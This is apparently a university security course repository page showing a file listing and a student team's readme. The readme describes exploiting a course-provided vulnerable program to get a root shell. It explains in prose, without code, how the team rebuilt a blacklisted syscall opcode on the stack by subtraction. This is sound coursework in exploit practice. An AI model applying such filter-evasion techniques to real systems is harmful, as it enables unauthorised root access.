school/csci5271
1
0
Fork 0
Code Issues Pull requests Projects Releases Wiki Activity
csci5271/bcvi
History
Michael Zhang d7cb704a4a
f
2018-01-29 17:30:43 -06:00
..
.vagrant/machines/default/virtualbox f 2018-01-29 17:30:43 -06:00
.vscode f 2018-01-29 17:30:43 -06:00
bcecho.c f 2018-01-29 17:30:43 -06:00
bcvi f 2018-01-29 17:30:43 -06:00
bcvi.1.0.c f 2018-01-29 17:30:43 -06:00
bcvi.1.1.c f 2018-01-29 17:30:43 -06:00
bcvi.1.2.c f 2018-01-29 17:30:43 -06:00
bcvi.1.3.c f 2018-01-29 17:30:43 -06:00
bcvi.c f 2018-01-29 17:30:43 -06:00
bcvi64 f 2018-01-29 17:30:43 -06:00
exploit.1.0.sh f 2018-01-29 17:30:43 -06:00
exploit.1.1.sh f 2018-01-29 17:30:43 -06:00
exploit.1.2.sh f 2018-01-29 17:30:43 -06:00
exploit.py f 2018-01-29 17:30:43 -06:00
exploit.sh f 2018-01-29 17:30:43 -06:00
ha1.2.tar.gz f 2018-01-29 17:30:43 -06:00
ha1.3.tar.gz f 2018-01-29 17:30:43 -06:00
incr-macro.txt f 2018-01-29 17:30:43 -06:00
Makefile f 2018-01-29 17:30:43 -06:00
readme.1.1.txt f 2018-01-29 17:30:43 -06:00
readme.txt f 2018-01-29 17:30:43 -06:00
rootshell.c f 2018-01-29 17:30:43 -06:00
setup.sh f 2018-01-29 17:30:43 -06:00
shell-macro.txt f 2018-01-29 17:30:43 -06:00
shellcode f 2018-01-29 17:30:43 -06:00
shellcode-b f 2018-01-29 17:30:43 -06:00
shellcode-b.s f 2018-01-29 17:30:43 -06:00
shellcode.c f 2018-01-29 17:30:43 -06:00
shellcode.s f 2018-01-29 17:30:43 -06:00
shit f 2018-01-29 17:30:43 -06:00
strace.log f 2018-01-29 17:30:43 -06:00
sudobcvi f 2018-01-29 17:30:43 -06:00
sudobcvi.conf f 2018-01-29 17:30:43 -06:00
sudobcvi64 f 2018-01-29 17:30:43 -06:00
test f 2018-01-29 17:30:43 -06:00
test.c f 2018-01-29 17:30:43 -06:00
test.symlink f 2018-01-29 17:30:43 -06:00
Vagrantfile f 2018-01-29 17:30:43 -06:00
valgrind.log f 2018-01-29 17:30:43 -06:00

readme.txt 


           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
                  pwned by Team Shell Smash       
        
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Group Members:
  - Michael Zhang (zhan4854)
  - Elliott Beach (beach144)
  - Jegatheeswaran Jerusan (jerus005)

Like last week's exploit, I took advantage of the run_macro function, only this
week's patch had blacklisted 0x05, which was part of the opcode for syscall
(0x0f05). However, it doesn't seem like call was blocked, so I simply pushed the
opcodes required for syscall (0x0f05) on to the stack backwards. Unfortunately,
since 0x05 was blocked, I couldn't push it directly, so I had to push 0x0f06
(obviously in little-endian order), and then perform a subtraction in order to
have the correct value on stack. Then with a simple call, I was able to execve
the root shell again! 

                                      -Writeup by Michael Zhang